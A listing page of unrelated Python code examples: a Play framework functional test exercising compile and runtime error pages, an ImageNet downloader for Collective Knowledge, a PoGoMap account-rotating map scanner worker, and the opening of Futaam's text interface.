        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/controllers/Application.java')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/models')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/Application')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/Application/index.html')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/main.html')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/errors/404.html')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/app/views/errors/500.html')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/conf')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/conf/routes')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/conf/messages')))
        self.assert_(os.path.exists(os.path.join(self.working_directory, 'yop/conf/application.conf')))

        app = '%s/yop' % self.working_directory

        # Run the newly created application
        step('Run the newly created application')
        
        self.play = callPlay(self, ['run', app])
        self.assert_(waitFor(self.play, 'Listening for HTTP on port 9000'))
        
        # Start a browser
        step('Start a browser')
        
        browser = mechanize.Browser()
        
        # Open the home page
        step('Open the home page')
        
        response = browser.open('http://localhost:9000/')
        self.assert_(waitFor(self.play, "Application 'YOP' is now started !"))
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')
        
        html = response.get_data()
        self.assert_(html.count('Your application is ready !'))
        
        # Open the documentation
        step('Open the documentation')
    
        browser.addheaders = [("Accept-Language", "en")]
        response = browser.open('http://localhost:9000/@documentation')
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Play manual - Documentation')
        
        html = response.get_data()
        self.assert_(html.count('Getting started'))
        
        # Go back to home
        step('Go back to home')
        
        response = browser.back()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')
        
        # Refresh
        step('Refresh home')
        
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')        
        html = response.get_data()
        self.assert_(html.count('Your application is ready !'))
        
        # Make a mistake in Application.java and refresh
        step('Make a mistake in Application.java')
        
        edit(app, 'app/controllers/Application.java', 13, '        render()')        
        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Compilation error'))
            self.assert_(html.count('insert ";" to complete BlockStatements'))
            self.assert_(html.count('In /app/controllers/Application.java (around line 13)'))
            self.assert_(html.count('       render()'))            
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Compilation error (In /app/controllers/Application.java around line 13)'))
            self.assert_(waitFor(self.play, 'Syntax error, insert ";" to complete BlockStatements'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))

        # Refresh again
        step('Refresh again')

        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Compilation error'))
            self.assert_(html.count('insert ";" to complete BlockStatements'))
            self.assert_(html.count('In /app/controllers/Application.java (around line 13)'))
            self.assert_(html.count('       render()'))            
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Compilation error (In /app/controllers/Application.java around line 13)'))
            self.assert_(waitFor(self.play, 'Syntax error, insert ";" to complete BlockStatements'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
        
        # Correct the error
        step('Correct the error')
        
        edit(app, 'app/controllers/Application.java', 13, '        render();')
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')        
        html = response.get_data()
        self.assert_(html.count('Your application is ready !'))

        # Refresh again
        step('Refresh again')
        
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Your application is ready !')        
        html = response.get_data()
        self.assert_(html.count('Your application is ready !'))
        
        # Let's code hello world
        step('Let\'s code hello world')
        time.sleep(1)
        
        edit(app, 'app/controllers/Application.java', 12, '  public static void index(String name) {')
        edit(app, 'app/controllers/Application.java', 13, '        render(name);')
        edit(app, 'app/views/Application/index.html', 2, "#{set title:'Hello world app' /}")
        edit(app, 'app/views/Application/index.html', 4, "Hello ${name} !!")
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello  !!'))
        
        response = browser.open('http://localhost:9000/?name=Guillaume')
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello Guillaume !!'))
        
        # Make a mistake in the template
        step('Make a mistake in the template')
        time.sleep(1)
        
        edit(app, 'app/views/Application/index.html', 4, "Hello ${name !!")
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines()) 
            self.assert_(html.count('Template compilation error'))
            self.assert_(html.count('In /app/views/Application/index.html (around line 4)'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Template compilation error (In /app/views/Application/index.html around line 4)'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
        
        # Refresh again
        step('Refresh again')
        
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines()) 
            self.assert_(html.count('Template compilation error'))
            self.assert_(html.count('In /app/views/Application/index.html (around line 4)'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Template compilation error (In /app/views/Application/index.html around line 4)'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            
        # Try a template runtime exception  
        step('Try a template runtime exception ')  
        time.sleep(1)
        
        edit(app, 'app/views/Application/index.html', 4, "Hello ${user.name}")
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines()) 
            self.assert_(html.count('Template execution error '))
            self.assert_(html.count('In /app/views/Application/index.html (around line 4)'))
            self.assert_(html.count('Cannot get property \'name\' on null object'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Template execution error (In /app/views/Application/index.html around line 4)'))
            self.assert_(waitFor(self.play, 'Execution error occured in template /app/views/Application/index.html.'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            self.assert_(waitFor(self.play, 'at /app/views/Application/index.html.(line:4)'))
            self.assert_(waitFor(self.play, '...'))

        # Refresh again
        step('Refresh again')
        
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines()) 
            self.assert_(html.count('Template execution error '))
            self.assert_(html.count('In /app/views/Application/index.html (around line 4)'))
            self.assert_(html.count('Cannot get property \'name\' on null object'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Template execution error (In /app/views/Application/index.html around line 4)'))
            self.assert_(waitFor(self.play, 'Execution error occured in template /app/views/Application/index.html.'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            self.assert_(waitFor(self.play, 'at /app/views/Application/index.html.(line:4)'))
            self.assert_(waitFor(self.play, '...'))

        # Fix it
        step('Fix it')        
        time.sleep(1)
        
        edit(app, 'app/views/Application/index.html', 4, "Hello ${name} !!")
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello Guillaume !!'))

        # Make a Java runtime exception
        step('Make a Java runtime exception')  
        
        insert(app, 'app/controllers/Application.java', 13, '        int a = 9/0;')     
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Execution exception'))
            self.assert_(html.count('/ by zero'))
            self.assert_(html.count('In /app/controllers/Application.java (around line 13)'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Execution exception (In /app/controllers/Application.java around line 13)'))
            self.assert_(waitFor(self.play, 'ArithmeticException occured : / by zero'))
            self.assert_(waitFor(self.play, 'at controllers.Application.index(Application.java:13)'))
            self.assert_(waitFor(self.play, '...'))

        # Refresh again
        step('Refresh again')
        
        try:
            response = browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Execution exception'))
            self.assert_(html.count('/ by zero'))
            self.assert_(html.count('In /app/controllers/Application.java (around line 13)'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Execution exception (In /app/controllers/Application.java around line 13)'))
            self.assert_(waitFor(self.play, 'ArithmeticException occured : / by zero'))
            self.assert_(waitFor(self.play, 'at controllers.Application.index(Application.java:13)'))
            self.assert_(waitFor(self.play, '...'))

        # Fix it
        step('Fix it')        
        time.sleep(1)
        
        delete(app, 'app/controllers/Application.java', 13)    
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello Guillaume !!'))

        # Refresh again
        step('Refresh again')
        
        response = browser.reload()
        self.assert_(browser.viewing_html())
        self.assert_(browser.title() == 'Hello world app')        
        html = response.get_data()
        self.assert_(html.count('Hello Guillaume !!'))

        # Create a new route
        step('Create a new route')
        
        insert(app, 'conf/routes', 7, "GET      /hello          Hello.hello")
        try:
            response = browser.open('http://localhost:9000/hello')
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Not found')
        
        # Create the new controller
        step('Create the new controller')
        time.sleep(1)
        
        create(app, 'app/controllers/Hello.java')
        insert(app, 'app/controllers/Hello.java', 1, "package controllers;")
        insert(app, 'app/controllers/Hello.java', 2, "import play.mvc.*;")
        insert(app, 'app/controllers/Hello.java', 3, "public class Hello extends Application {")
        insert(app, 'app/controllers/Hello.java', 4, "  public static void hello() {")
        insert(app, 'app/controllers/Hello.java', 5, '      renderText("Hello");')
        insert(app, 'app/controllers/Hello.java', 6, '  }')
        insert(app, 'app/controllers/Hello.java', 7, '}')
        
        # Retry
        step('Retry')
        
        browser.reload()
        self.assert_(not browser.viewing_html())   
        html = response.get_data()
        self.assert_(html.count('Hello'))
        
        # Rename the Hello controller
        step('Rename the Hello controller')
        time.sleep(1)
        
        rename(app, 'app/controllers/Hello.java', 'app/controllers/Hello2.java')
        edit(app, 'app/controllers/Hello2.java', 3, "public class Hello2 extends Application {")
        
        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Not found')

        # Refresh again
        step('Refresh again')
            
        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Not found')            

        # Correct the routes file
        step('Correct the routes file')
        time.sleep(1)

        edit(app, 'conf/routes', 7, "GET      /hello          Hello2.hello")

        browser.reload()
        self.assert_(not browser.viewing_html())   
        html = response.get_data()
        self.assert_(html.count('Hello'))        

        # Retry
        step('Retry')
        
        browser.reload()
        self.assert_(not browser.viewing_html())   
        html = response.get_data()
        self.assert_(html.count('Hello'))
        
        # Rename again
        step('Rename again')
        time.sleep(1)
        
        rename(app, 'app/controllers/Hello2.java', 'app/controllers/Hello3.java')
        edit(app, 'conf/routes', 7, "GET      /hello          Hello3.hello")
        
        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Compilation error'))
            self.assert_(html.count('/app/controllers/Hello3.java</strong> could not be compiled'))
            self.assert_(html.count('The public type Hello2 must be defined in its own file'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Compilation error (In /app/controllers/Hello3.java around line 3)'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            
        # Refresh again
        step('Refresh again')

        try:
            browser.reload()
            self.fail()
        except urllib2.HTTPError, error:
            self.assert_(browser.viewing_html())
            self.assert_(browser.title() == 'Application error')
            html = ''.join(error.readlines())
            self.assert_(html.count('Compilation error'))
            self.assert_(html.count('/app/controllers/Hello3.java</strong> could not be compiled'))
            self.assert_(html.count('The public type Hello2 must be defined in its own file'))
            self.assert_(waitFor(self.play, 'ERROR'))
            self.assert_(waitFor(self.play, 'Compilation error (In /app/controllers/Hello3.java around line 3)'))
            self.assert_(waitFor(self.play, 'at Invocation.HTTP Request(Play!)'))
            
        # Fix it
        step('Fix it')
        
        edit(app, 'app/controllers/Hello3.java', 3, "public class Hello3 extends Application {")
        browser.reload()
        self.assert_(not browser.viewing_html())   
        html = response.get_data()
        self.assert_(html.count('Hello'))

        # Stop the application
        step('Kill play')
        
        killPlay()
        self.play.wait()

Example 26

View license
def download_list(list_file,
                  timeout=10,
                  retry=10,
                  num_jobs=1,
                  sleep_after_dl=1,
                  verbose=False,
                  offset=0,
                  msg=1):
    """Try to download all images whose URLs are listed in 'list_file'
    and register them with Collective Knowledge.

    The file is expected to have lines in either of the forms:

    a) <category>_<index> <url>

    Example:
    n04515003_4421  http://www.danheller.com/images/Europe/CzechRepublic/Prague/Misc/upright-bass-n-piano.jpg

    That is, the WordNet ID of a category ("category" for short)
    concatenated with a unique index, followed by a URL.

    The downloaded image will be added to a local CK repository called
    "imagenet-<category>" as a dataset entry called "<index>",
    tagged with "imagenet", <category>, <index>, <url>.

    b) <url>
    http://www.danheller.com/images/Europe/CzechRepublic/Prague/Misc/upright-bass-n-piano.jpg

    The downloaded image with be added to a local CK repository called
    "imagenet-unknown" as a dataset with a unique random index,
    tagged with "imagenet" and <url>.
    """

    #make_directory(out_dir)

    count_total = 0
    with open(list_file) as list_in:
        for i, l in enumerate(list_in):
            pass
        count_total = i + 1
    count_total -= offset

    sys.stderr.write('Total: {0}\n'.format(count_total))

    num_jobs = max(num_jobs, 1)

    entries = Queue.Queue(num_jobs)
    done = [False]

    counts_fail = [0 for i in xrange(num_jobs)]
    counts_success = [0 for i in xrange(num_jobs)]

    def producer():
        count = 0
        with open(list_file) as list_in:
            for line in list_in:
                if count >= offset:
                    sep = None; max_split = 1
                    prefix_url = line.strip().split(sep, max_split)
                    if len(prefix_url) == 2: # prefix and URL
                        prefix = prefix_url[0]
                        url = prefix_url[1]
                        category_index = prefix.split('_', max_split)
                        if len(category_index) == 2: # category and index
                            category = category_index[0]
                            index = category_index[1]
                        elif len(category_index) == 1: # category only
                            category = category_index[0]
                            index = count
                        else:
                            if verbose:
                                sys.stderr.write('Error: Invalid line: {0}\n'.format(line))
                    elif len(prefix_url) == 1: # URL only
                        url = prefix_url[0]
                        category = "unknown"
                        index = count
                    else:
                        if verbose:
                            sys.stderr.write('Error: Invalid line: {0}\n'.format(line))
                    entries.put((category, index, url), block=True)
                count += 1

        entries.join()
        done[0] = True

    def consumer(i):
        while not done[0]:
            try:
                category, index, url = entries.get(timeout=1)
            except:
                continue

            try:
                # Try adding a CK repository for this category.
                repo_uoa = 'local'; module_uoa = 'repo'; data_uoa = 'imagenet-%s' % category
                r=ck.access({
                    'action':'add',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa
                })
                if r['return']>0:
                    # If already exists, give a warning rather than an error.
                    if r['return']==16:
                        if verbose:
                            sys.stdout.write ("CK info: repository for category \'%s\' already exists.\n" % category)
                    else:
                        if verbose:
                            sys.stderr.write ("CK error: %s\n" % r['error'])
                        counts_fail[i] += 1
                        continue

                # Get the CK repository for this category.
                # FIXME: "ck add --help" says that it returns
                # "Output from the 'create_entry' function".
                # It may be possible to extract the repo uoa for this category
                # from it but it's unclear what it contains...
                r=ck.access({
                    'action':'search',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue
                if len(r['lst'])!=1:
                    if verbose:
                        sys.stderr.write ("CK error: %d repositories found, expected 1\n" % len(r['lst']))
                    counts_fail[i] += 1
                    continue
                
                # Search for an image by the given category URL.
                # (Ignore the index as it may not be unique.)
                repo_uoa=r['lst'][0]['data_uoa']
                module_uoa='dataset'
                tags='imagenet,%s,%s' % (category,url)
                r=ck.access({
                    'action':'search',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'tags':tags
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue
                if len(r['lst'])>0:
                    # If already exists, give a warning rather than an error.
                    if verbose:
                        sys.stdout.write ("CK info: image at \'%s\' already downloaded\n" % url)
                    counts_success[i] += 1
                    entries.task_done()
                    continue
                
                # Add the given image to the repository for this category. 
                data_uoa=str(index).zfill(9)
                r=ck.access({
                    'action':'add',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa,
                    'tags':tags
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue
                # FIXME: "ck add --help" says that it returns
                # "Output from the 'create_entry' function".
                # It may be possible to extract the repo uoa for this category
                # from it but it's unclear what it contains...
                r=ck.access({
                    'action':'search',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue
                if len(r['lst'])!=1:
                    if verbose:
                        sys.stderr.write ("CK error: %d dataset entries found, expected 1\n" % len(r['lst']))
                    counts_fail[i] += 1
                    continue

                # Download the image into the image dataset directory.
                directory = r['lst'][0]['path']
                content = download(url, timeout, retry, sleep_after_dl)
                ext = imgtype2ext(imghdr.what('', content))
                name = '{0}.{1}'.format(category, ext)
                path = os.path.join(directory, name)
                with open(path, 'w') as f:
                    f.write(content)

                # Download the image category description.
                words_url = "http://www.image-net.org/api/text/wordnet.synset.getwords?wnid=%s" % category
                content = download(words_url, timeout, retry, sleep_after_dl)
                all_words = content.split("\n")

                # Update the image metadata.
                info={}
                info['dataset_files'] = [ name ]
                info['dataset_words'] = [ word for word in all_words if word != ""]
                r=ck.access({
                    'action':'update',
                    'repo_uoa':repo_uoa,
                    'module_uoa':module_uoa,
                    'data_uoa':data_uoa,
                    'dict':info
                })
                if r['return']>0:
                    if verbose:
                        sys.stderr.write ("CK error: %s\n" % r['error'])
                    counts_fail[i] += 1
                    continue

                counts_success[i] += 1
                time.sleep(sleep_after_dl)

            except Exception as e:
                counts_fail[i] += 1
                if verbose:
                    sys.stderr.write('Error: {0} / {1}: {2}\n'.format(category, url, e))

            entries.task_done()

    def message_loop():
        if verbose:
            delim = '\n'
        else:
            delim = '\r'

        while not done[0]:
            count_success = sum(counts_success)
            count = count_success + sum(counts_fail)
            rate_done = count * 100.0 / count_total
            if count == 0:
                rate_success = 0
            else:
                rate_success = count_success * 100.0 / count
            sys.stderr.write(
                '{0} / {1} ({2: 2.2f}%) done, {3} / {0} ({4: 2.2f}%) succeeded                    {5}'.format(
                    count, count_total, rate_done, count_success, rate_success, delim))

            time.sleep(msg)

    producer_thread = threading.Thread(target=producer)
    consumer_threads = [threading.Thread(target=consumer, args=(i,)) for i in xrange(num_jobs)]
    message_thread = threading.Thread(target=message_loop)

    producer_thread.start()
    for t in consumer_threads:
        t.start()
    message_thread.start()

    # Explicitly wait to accept SIGINT
    try:
        while producer_thread.isAlive():
            time.sleep(1)
    except:
        sys.exit(1)

    producer_thread.join()
    for t in consumer_threads:
        t.join()
    message_thread.join()

    sys.stderr.write('\ndone\n')

Example 27

Project: PoGoMap-GUI
Source File: search.py
View license
def search_worker_thread(args, account_queue, account_failures, search_items_queue, pause_bit, encryption_lib_path, status, dbq, whq):

    log.debug('Search worker thread starting')

    # The outer forever loop restarts only when the inner one is intentionally exited - which should only be done when the worker is failing too often, and probably banned.
    # This reinitializes the API and grabs a new account from the queue.
    while True:
        try:
            status['starttime'] = now()

            # Get account
            status['message'] = 'Waiting to get new account from the queue'
            log.info(status['message'])
            account = account_queue.get()
            status['message'] = 'Switching to account {}'.format(account['username'])
            status['user'] = account['username']
            log.info(status['message'])

            stagger_thread(args, account)

            # New lease of life right here
            status['fail'] = 0
            status['success'] = 0
            status['noitems'] = 0
            status['skip'] = 0
            status['location'] = False
            status['last_scan_time'] = 0

            # only sleep when consecutive_fails reaches max_failures, overall fails for stat purposes
            consecutive_fails = 0

            # Create the API instance this will use
            if args.mock != '':
                api = FakePogoApi(args.mock)
            else:
                api = PGoApi()

            if status['proxy_url']:
                log.debug("Using proxy %s", status['proxy_url'])
                api.set_proxy({'http': status['proxy_url'], 'https': status['proxy_url']})

            api.activate_signature(encryption_lib_path)

            # The forever loop for the searches
            while True:

                # If this account has been messing up too hard, let it rest
                if consecutive_fails >= args.max_failures:
                    status['message'] = 'Account {} failed more than {} scans; possibly bad account. Switching accounts...'.format(account['username'], args.max_failures)
                    log.warning(status['message'])
                    account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'failures'})
                    break  # exit this loop to get a new account and have the API recreated

                while pause_bit.is_set():
                    status['message'] = 'Scanning paused'
                    time.sleep(2)

                # If this account has been running too long, let it rest
                if (args.account_search_interval is not None):
                    if (status['starttime'] <= (now() - args.account_search_interval)):
                        status['message'] = 'Account {} is being rotated out to rest.'.format(account['username'])
                        log.info(status['message'])
                        account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'rest interval'})
                        break

                # Grab the next thing to search (when available)
                status['message'] = 'Waiting for item from queue'
                step, step_location, appears, leaves = search_items_queue.get()

                # too soon?
                if appears and now() < appears + 10:  # adding a 10 second grace period
                    first_loop = True
                    paused = False
                    while now() < appears + 10:
                        if pause_bit.is_set():
                            paused = True
                            break  # why can't python just have `break 2`...
                        remain = appears - now() + 10
                        status['message'] = 'Early for {:6f},{:6f}; waiting {}s...'.format(step_location[0], step_location[1], remain)
                        if first_loop:
                            log.info(status['message'])
                            first_loop = False
                        time.sleep(1)
                    if paused:
                        search_items_queue.task_done()
                        continue

                # too late?
                if leaves and now() > (leaves - args.min_seconds_left):
                    search_items_queue.task_done()
                    status['skip'] += 1
                    # it is slightly silly to put this in status['message'] since it'll be overwritten very shortly after. Oh well.
                    status['message'] = 'Too late for location {:6f},{:6f}; skipping'.format(step_location[0], step_location[1])
                    log.info(status['message'])
                    # No sleep here; we've not done anything worth sleeping for. Plus we clearly need to catch up!
                    continue

                # Let the api know where we intend to be for this loop
                # doing this before check_login so it does not also have to be done there
                # when the auth token is refreshed
                api.set_position(*step_location)

                # Ok, let's get started -- check our login status
                check_login(args, account, api, step_location, status['proxy_url'])

                # putting this message after the check_login so the messages aren't out of order
                status['message'] = 'Searching at {:6f},{:6f}'.format(step_location[0], step_location[1])
                log.info(status['message'])

                # Make the actual request (finally!)
                response_dict = map_request(api, step_location, args.jitter)

                # G'damnit, nothing back. Mark it up, sleep, carry on
                if not response_dict:
                    status['fail'] += 1
                    consecutive_fails += 1
                    status['message'] = 'Invalid response at {:6f},{:6f}, abandoning location'.format(step_location[0], step_location[1])
                    log.error(status['message'])
                    time.sleep(args.scan_delay)
                    continue

                # Got the response, parse it out, send todo's to db/wh queues
                try:
                    parsed = parse_map(args, response_dict, step_location, dbq, whq, api)
                    search_items_queue.task_done()
                    status[('success' if parsed['count'] > 0 else 'noitems')] += 1
                    consecutive_fails = 0
                    status['message'] = 'Search at {:6f},{:6f} completed with {} finds'.format(step_location[0], step_location[1], parsed['count'])
                    log.debug(status['message'])
                except KeyError:
                    parsed = False
                    status['fail'] += 1
                    consecutive_fails += 1
                    status['message'] = 'Map parse failed at {:6f},{:6f}, abandoning location. {} may be banned.'.format(step_location[0], step_location[1], account['username'])
                    log.exception(status['message'])

                # Get detailed information about gyms
                if args.gym_info and parsed:
                    # build up a list of gyms to update
                    gyms_to_update = {}
                    for gym in parsed['gyms'].values():
                        # Can only get gym details within 1km of our position
                        distance = calc_distance(step_location, [gym['latitude'], gym['longitude']])
                        if distance < 1:
                            # check if we already have details on this gym (if not, get them)
                            try:
                                record = GymDetails.get(gym_id=gym['gym_id'])
                            except GymDetails.DoesNotExist as e:
                                gyms_to_update[gym['gym_id']] = gym
                                continue

                            # if we have a record of this gym already, check if the gym has been updated since our last update
                            if record.last_scanned < gym['last_modified']:
                                gyms_to_update[gym['gym_id']] = gym
                                continue
                            else:
                                log.debug('Skipping update of gym @ %f/%f, up to date', gym['latitude'], gym['longitude'])
                                continue
                        else:
                            log.debug('Skipping update of gym @ %f/%f, too far away from our location at %f/%f (%fkm)', gym['latitude'], gym['longitude'], step_location[0], step_location[1], distance)

                    if len(gyms_to_update):
                        gym_responses = {}
                        current_gym = 1
                        status['message'] = 'Updating {} gyms for location {},{}...'.format(len(gyms_to_update), step_location[0], step_location[1])
                        log.debug(status['message'])

                        for gym in gyms_to_update.values():
                            status['message'] = 'Getting details for gym {} of {} for location {},{}...'.format(current_gym, len(gyms_to_update), step_location[0], step_location[1])
                            time.sleep(random.random() + 2)
                            response = gym_request(api, step_location, gym)

                            # make sure the gym was in range. (sometimes the API gets cranky about gyms that are ALMOST 1km away)
                            if response['responses']['GET_GYM_DETAILS']['result'] == 2:
                                log.warning('Gym @ %f/%f is out of range (%dkm), skipping', gym['latitude'], gym['longitude'], distance)
                            else:
                                gym_responses[gym['gym_id']] = response['responses']['GET_GYM_DETAILS']

                            # increment which gym we're on (for status messages)
                            current_gym += 1

                        status['message'] = 'Processing details of {} gyms for location {},{}...'.format(len(gyms_to_update), step_location[0], step_location[1])
                        log.debug(status['message'])

                        if gym_responses:
                            parse_gyms(args, gym_responses, whq)

                # Record the time and place the worker left off at
                status['last_scan_time'] = now()
                status['location'] = step_location

                # Always delay the desired amount after "scan" completion
                status['message'] += ', sleeping {}s until {}'.format(args.scan_delay, time.strftime('%H:%M:%S', time.localtime(time.time() + args.scan_delay)))
                time.sleep(args.scan_delay)

        # catch any process exceptions, log them, and continue the thread
        except Exception as e:
            status['message'] = 'Exception in search_worker using account {}. Restarting with fresh account. See logs for details.'.format(account['username'])
            time.sleep(args.scan_delay)
            log.error('Exception in search_worker under account {} Exception message: {}'.format(account['username'], e))
            account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'exception'})

Example 28

Project: Futaam
Source File: text.py
View license
def main(argv, version):
    """The text interface's main method."""
    global PS1
    ANNInitRet = ANN.init()
    if ANNInitRet == 0:
        pass
    elif ANNInitRet == 1:
        print(COLORS.header + 'Updating metadata...' + COLORS.default)
        ANN.fetch_report(50)
    elif ANNInitRet == 2:
        print(COLORS.header + 'Updating ANN metadata cache for the first time...' + COLORS.default)
        ANN.fetch_report('all')
	
    # gather arguments
    dbfile = ARGS.database
    host = ''
    if ARGS.host:
        host = ARGS.host
    password = ''
    if ARGS.password:
        password = ARGS.password
    username = ''
    if ARGS.username:
        username = ARGS.username
    port = 8500
    if ARGS.port:
        port = ARGS.port
    hooks = []
    if ARGS.hooks:
        hooks = ARGS.hooks

    if len(dbfile) == 0 and host == '':
        print(COLORS.fail + 'No database specified' + COLORS.default)
        print('To create a database, use the argument "--create" or "-c"' +\
		'(no quotes)')
        sys.exit(1)

    if host == '':
        dbs = []
        for filename in dbfile:
            dbs.append(parser.Parser(filename, hooks=hooks))
        currentdb = 0
    else:
        if username == '':
            if 'default.user' in CONFS:
                print('[' + COLORS.blue + 'info' + COLORS.default +\
				'] using default user')
                username = CONFS['default.user']
            else:
                username = input('Username for \'' + host + '\': ')
        if 'default.password' in CONFS:
            print('[' + COLORS.blue + 'info' + COLORS.default +\
            '] using default password')
            password = CONFS['default.password']
        else:
            password = getpass.getpass(
                'Password for \'' + username + '@' + host + '\': ')
        dbs = []
        try:
            dbs.append(
                parser.Parser(host=host, port=port, username=username,
				password=password, hooks=hooks))
        except Exception as exception:
            print('[' + COLORS.fail + 'error' + COLORS.default + '] ' +\
			str(exception).replace('305 ', ''))
            sys.exit(1)

        currentdb = 0

    print(COLORS.header + dbs[currentdb].dictionary['name'] + COLORS.default +\
	' (' + dbs[currentdb].dictionary['description'] + ')')
    print('Type help for cheat sheet')
    if len(dbs) > 1:
        print('Type switchdb to change to the next database')
    sys.stdout.write('\n')

    while True:
        try:
            now = datetime.datetime.now()
            ps1_replace = {'%N': dbs[currentdb].dictionary['name'], '%D':
			dbs[currentdb].dictionary['description'], '%h': now.strftime('%H'),
			'%m': now.strftime('%M'), chr(37) + 's': now.strftime(
            '%S'), '%blue%': COLORS.blue, '%green%': COLORS.green, '%red%':
			COLORS.fail, '%orange%': COLORS.warning, '%purple%': COLORS.header,
			'%default%': COLORS.default}
            ps1_temp = PS1
            ps1_temp = ps1_temp.replace('\%', '%' + chr(5))
            for replacer in ps1_replace:
                ps1_temp = ps1_temp.replace(replacer, ps1_replace[replacer])
            ps1_temp = ps1_temp.replace(chr(5), '')
            cmd = input(ps1_temp + COLORS.default).lstrip()
